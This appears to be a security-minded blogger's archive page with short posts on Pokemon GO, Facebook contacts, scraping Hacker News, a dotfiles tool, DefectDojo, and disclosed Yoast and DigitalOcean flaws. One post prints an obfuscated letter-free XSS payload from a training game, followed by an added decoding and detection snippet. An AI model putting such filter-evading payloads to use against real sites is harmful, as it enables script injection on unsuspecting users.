All posts by c

21 Tips and Resources for The Obsessed Pokemon GO Player

I’ve become somewhat obsessed with Pokemon GO since I started playing it, and I’ve been trying to cobble together a mental guide for how to be successful from a hodge-podge of sites, people I’ve met while playing the game, and some of my own experiences. Here’s what I’ve got so far. Items in red are ones I’m less sure of.

Finding Pokemon

  1. The panel at the bottom right tells you which Pokemon are near. 3 footprints = far, 2 footprints = nearby, 1 footprint = close, none = very close
  2. The Pokemon in the panel are arranged by closeness. Watching how they re-arrange as you walk in one direction will tell you if you’re hot or cold. Work together with friends to cover a wider area
  3. Rustling grass patches aren’t necessarily Pokemon. They may be nearby, though
  4. Look for Pokemon GO maps of your city on reddit. You can also use the official Ingress map for a rough guide, but you have to sign up for an account, which I didn’t bother to do.
    1. Bonus! For those lucky enough to live in Austin, here’s a user-created map of the various locations of note
  5. Some Pokemon are easiest to get by hatching eggs. Check out this list of Pokemon with the distance required to hatch their egg to get an idea of what each of your eggs might be
  6. Incense seems to mostly attract common Pokemon, so it’s useful when you’re trying to catch a few to level up
  7. Walking along roadways SEEMS to yield fairly weak results. Try finding parks and other open areas that are high in pedestrian traffic. There also doesn’t seem to be any universal rarity scale – it appears to be dependent on where you are, so look around when you’re far from home!

Once You Find Them

  1. Spinning your pokeball with your finger (swiping to the side) before throwing it makes you throw a curveball, which gives you a 10 XP bonus. It MIGHT make your throw more effective too, but I’m not sure about this
  2. Hitting a Pokemon in the colored circle, when the circle is small, gives you the best chance to capture it. Hit it outside the colored circle, or when the circle is bigger, and it’ll be harder
  3. Waiting to evolve your Pokemon until you’re a higher level will improve the boost in CP your Pokemon gets

Getting Items

  1. Poke Stops regenerate after a few minutes. If you find a comfortable spot, hit one a few times. If you’re surrounded by them, walk in a circuit so that the first one is recharged by the time you return to it
  2. Controlling a gym for 21 hours gives you a small number of Poke-coins that you can spend in the store. Work with teammates to help lock down gyms

Battling Other Players

  1. To train your Pokemon, go to a gym owned by your team and tap the boxing glove icon to train against the Pokemon at that gym
  2. Leaving a Pokemon at a friendly-controlled gym will help strengthen it against rival teams, since rivals will have to defeat your Pokemon before taking on the gym’s master
  3. Here’s Niantic’s guide for attacking a rival-controlled gym, and using attacks in general

Battling the App

  1. Carry around a battery pack for your phone. Seriously.
  2. Turn on “battery saver” and turn your phone upside down. The screen will dim, and the phone will vibrate when there is a Pokemon nearby
  3. Disabling the AR feature saves some battery, and sanity (you won’t have to turn around constantly trying to find your Pokemon)
  4. If you want to get really hardcore, you could buy a Pokemon GO wearable for ~$200 on eBay so you don’t have to stare at your phone constantly (they supposedly ship in late July). Caveat emptor. Pre-orders sold out, but Nintendo will probably offer them for sale again in the near future given the game’s popularity
  5. Be aware that, on iOS at the moment, you’ll be giving up full access to your Google account if you log in with it. Niantic says they’re working on a fix, but in the meantime, maybe try creating a Trainer account instead
  6. All those people you see huddled around popular Poke stops, pacing around while staring at their phones? Go talk to them – they probably know something that you and I don’t!

Good luck out there!

Where do those “Recommended Friends” come from?

Have you ever logged onto Facebook to find “Recommended Friends” that you didn’t expect to see? Maybe someone you briefly met on Tinder, or a co-worker you hate? I think many people are unaware that, by default, the Facebook app on mobile devices automatically imports your contact list, continuously (this includes, so far as I can tell, every piece of information about them that you have stored).

I started noticing this a long time ago, but I sense that there are many who just assume Facebook is omniscient and don’t give it another thought. There are many reasons you may not want to give up this power, and so far as I can tell, the only way to stop importing this information is to delete the Facebook app from your phone. If anyone is aware of a specific privacy setting one can use to disable this behavior, leave a comment on this post!

If you’ve already unwittingly imported your contacts (you can see them here) and want to remove them, click here.

Analyzing ~425 days of Hacker News posts with standard shell commands

(About) 425 days ago (at the time of this writing) I started scraping Hacker News via its shiny new API. And then I promptly forgot about it. That is, until I noticed my cronjob had been throwing errors constantly for a few weeks:

Traceback (most recent call last):
  File "/home/dummy/projects/hn-cron/hn.py", line 62, in <module>
    main()
  File "/home/dummy/projects/hn-cron/hn.py", line 53, in main
    log_line = str(details['id']) + "\t" + details['title'] + "\t" + details['url'] + "\t" + str(details['score']) + "\n"
KeyError: 'url'

Instead of fixing anything, I just commented out the cronjob. But now I feel somewhat obligated to do at least a rudimentary analysis of this data. In keeping with my extreme negligence/laziness throughout this project, I hacked together a few bash commands to do just that.

A few notes about this data, and the (in)accuracy thereof:

  1. The script ran once every 40 minutes, collecting the 30 most popular stories (i.e. those on the front page), and adding them to the list if they were new
  2. I only know I started roughly 425 days ago because the first link in log.txt was this one right here (Who needs timestamps? I have IDs!)
  3. A not-insignificant percent (probably ~10%) of the time, the script would fail because the stupid(, stupid, stupid) Python 2 script I banged out in 10 minutes didn’t know how to handle Unicode characters properly (oops).
  4. I saved everything to a tab-delimited flat file. I probably should’ve used something else, but I didn’t, so here we are.
  5. I only saved the score from the first time a story was found, so theoretically any given post only had an arbitrary 40 minute window to accumulate points, at most. This is probably not strictly true for a number of reasons, but I’m going to pretend it is.
  6. These bash commands grew organically (often with much help from StackOverflow), so they made sense to me at the time, but YMMV
  7. The data is probably inaccurate in a million small ways, but overall, it’s at least worth poking at.

Okay, let’s get down to it!

Constructing an XSS vector, using no letters

At the risk of spoiling a somewhat-well-known XSS game, I want to share an XSS vector I had never thought of before it forced me to. The premise of this level was, essentially, that you couldn’t use any letters whatsoever in the attack vector, and you had to call alert(1).

So, without further ado, here it is:

""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

What a mess, right?! What the hell are we doing here? Let’s take it piece-by-piece.
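As an added example (not code from the original post), the JavaScript below decodes the vector above without executing it: it rebuilds each string from the same coercions the vector relies on, checks that the lookup chain really reaches `Function`, and adds a small defender-side heuristic for flagging letter-free input. `VECTOR`, `decodeVector` and `looksLetterless` are names chosen here.

```javascript
// Added example: decode the letter-free vector piece by piece instead of running it.
// The whole trick rests on three fixed coercions, each a string that can be
// indexed one character at a time.
const FALSE = !1 + "";   // "false"
const TRUE = !0 + "";    // "true"
const OBJ = "" + {};     // "[object Object]"

// The vector from the post, kept as a string so nothing here evaluates it.
const VECTOR = `""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()`;

function decodeVector() {
  // (!1+"")[3] + (!0+"")[2] + (''+{})[2]  ->  "s" + "u" + "b"
  const method = FALSE[3] + TRUE[2] + OBJ[2];
  // Coercing the built-in String.prototype.sub to a string yields
  // "function sub() { [native code] }"; index 2 is the letter "n", which
  // none of the three fixed strings contains.
  const n = ("" + ""[method])[2];
  // (''+{})[5] + (''+{})[1] + n + ...  ->  "constructor"
  const ctor = OBJ[5] + OBJ[1] + n + FALSE[3] + TRUE[0] + TRUE[1] + TRUE[2]
             + OBJ[5] + TRUE[0] + OBJ[1] + TRUE[1];
  // (!1+"")[1] + (!1+"")[2] + (!0+"")[3] + (!0+"")[1] + (!0+"")[0]  ->  "alert"
  const arg = FALSE[1] + FALSE[2] + TRUE[3] + TRUE[1] + TRUE[0];
  // "".sub.constructor is Function, so the vector ends up calling Function(arg + "(1)")().
  return { method, ctor, arg, reachesFunction: ""[method][ctor] === Function };
}

// Defender-side heuristic (assumption: you are screening untrusted input before it
// reaches a page): no ASCII letters at all, several boolean/object coercion idioms,
// and many numeric index lookups is the signature of this obfuscation style.
function looksLetterless(src) {
  const noLetters = !/[A-Za-z]/.test(src);
  const idioms = (src.match(/!\s*[01]\s*\+\s*(""|'')|(""|'')\s*\+\s*\{\}/g) || []).length;
  const indexed = (src.match(/\)\s*\[\s*\d+\s*\]/g) || []).length;
  return noLetters && idioms >= 3 && indexed >= 6;
}

console.log(decodeVector(), looksLetterless(VECTOR));
```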

dot-man

I recently hacked together a little 300-line bash script called dot-man to manage my dotfiles. Basically, it lets you keep your dotfiles in a git repository, and you can run it every so often to keep your local and remote dotfiles in sync.

Install is as simple as:

git clone git@github.com:cneill/dot-man.git
OR
git clone https://github.com/cneill/dot-man.git

Let me know what you think! You can find me on Twitter @ccneill.

A tale of lost entropy

Recently, while looking at a JavaScript function intended to generate a cryptographically-secure random IV to be used in AES-GCM, I noticed something interesting which I immediately suspected was not unique to this project. Sure enough, Matt, my awesome colleague, sent me a link to a how-to article describing the process of generating random values in Node.js that included the exact same quirk.

Here is their example (with minor edits so as not to call out the author of that how-to post too explicitly):

Do you notice anything fishy?

Yoast SEO Plugin Authenticated, Stored XSS Vulnerability

The “snippet preview” functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2 (<= 2.1.1). This vulnerability appears to have been reported 2 years ago by someone named “badconker”, but the plugin author said that it was already patched. Unfortunately, it appears that this is not the case. If you are running this plugin, I recommend updating to the latest version.

Yoast WordPress SEO XSS in action

DefectDojo

Announcing DefectDojo v1.0.2!

I’m happy to announce the latest version of a project that the Security Engineering team at Rackspace has been working on: DefectDojo! DefectDojo is an open source defect tracking system that was created by our team to keep up with security engagements, but it can be useful for tracking any type of application testing. It supports functionality like Finding templates, PDF report generation, metrics graphs, charts, and some self-service tools for doing port scans, for example.

Checking out DefectDojo

A view of the DefectDojo dashboard

To get the latest version, you can download a zip file or view the source on Github. Want to check out a demo before installing it on your machine? We have you covered.

Login as admin:

Login as product owner / non-staff user:

Evading security logging when logging into DigitalOcean (Fixed)

I noticed a while back that when I carelessly entered my login credentials to the form for registering a new user account on the front page of the DigitalOcean site, it would still log me in. Neato.

However, I was slightly less amused when I noticed that the login event didn’t show an IP address in my security history.

Security history page with IP address conspicuously missing

User.login event with IP address conspicuously missing

I reported this at the time the screenshot was taken several months ago. It appears they have recently fixed the issue.

Just a reminder that not all vulnerabilities are obvious, and you can’t find them all with Burp.